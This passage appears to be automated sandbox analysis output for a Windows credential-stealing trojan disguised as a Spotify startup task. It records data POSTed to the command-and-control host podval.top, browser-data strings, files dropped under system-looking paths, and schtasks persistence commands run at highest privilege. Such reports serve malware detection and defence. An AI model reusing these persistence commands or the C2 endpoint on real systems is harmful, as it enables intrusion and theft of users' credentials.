                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1780Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 174868Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: podval.top
                              Source: unknownHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: upfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://podval.top
                              Source: upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://podval.top/
                              Source: upfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\b83e72d5c7bd2dJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMPJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1790D780_2_00007FF7C1790D78
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B8A5200_2_00007FF7C1B8A520
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 0_2_00007FF7C1B87C680_2_00007FF7C1B87C68
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1790D7817_2_00007FF7C1790D78
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B8B1B517_2_00007FF7C1B8B1B5
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C1B87C6817_2_00007FF7C1B87C68
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 18_2_00007FF7C17CCDC818_2_00007FF7C17CCDC8
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 18_2_00007FF7C1790D7818_2_00007FF7C1790D78
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 38_2_00007FF7C17CCDC838_2_00007FF7C17CCDC8
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 38_2_00007FF7C1790D7838_2_00007FF7C1790D78
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeCode function: 39_2_00007FF7C1780D7839_2_00007FF7C1780D78
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeCode function: 40_2_00007FF7C1770D7840_2_00007FF7C1770D78
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeCode function: 41_2_00007FF7C17DCDC841_2_00007FF7C17DCDC8
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeCode function: 41_2_00007FF7C17A0D7841_2_00007FF7C17A0D78
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeCode function: 42_2_00007FF7C17B0D7842_2_00007FF7C17B0D78
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeCode function: 43_2_00007FF7C17A0D7843_2_00007FF7C17A0D78
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AHphtSeX.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000000.1240865306.0000000000586000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1312234692.000000001B8FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000026.00000002.1429420020.00000000032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.00000000029DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.0000000002A8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: llflCdrMcgGB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: upfc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: upfc.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csCryptographic APIs: 'CreateDecryptor'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csCryptographic APIs: 'CreateDecryptor'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csCryptographic APIs: 'CreateDecryptor'
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@42/58@1/1
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Program Files\7-Zip\Lang\upfc.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\YPnuykix.logJump to behavior
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KBzVK5gMd7NT4ldKjHn2
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\AppData\Local\Temp\pb5w2chyJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: GuaAEdheNO.17.dr, XRbfGtKxff.17.dr, FPVtplfwjV.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeReversingLabs: Detection: 72%
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile read: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"
                              Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\upfc.exe "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\upfc.exe "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: unknownProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat" Jump to behavior
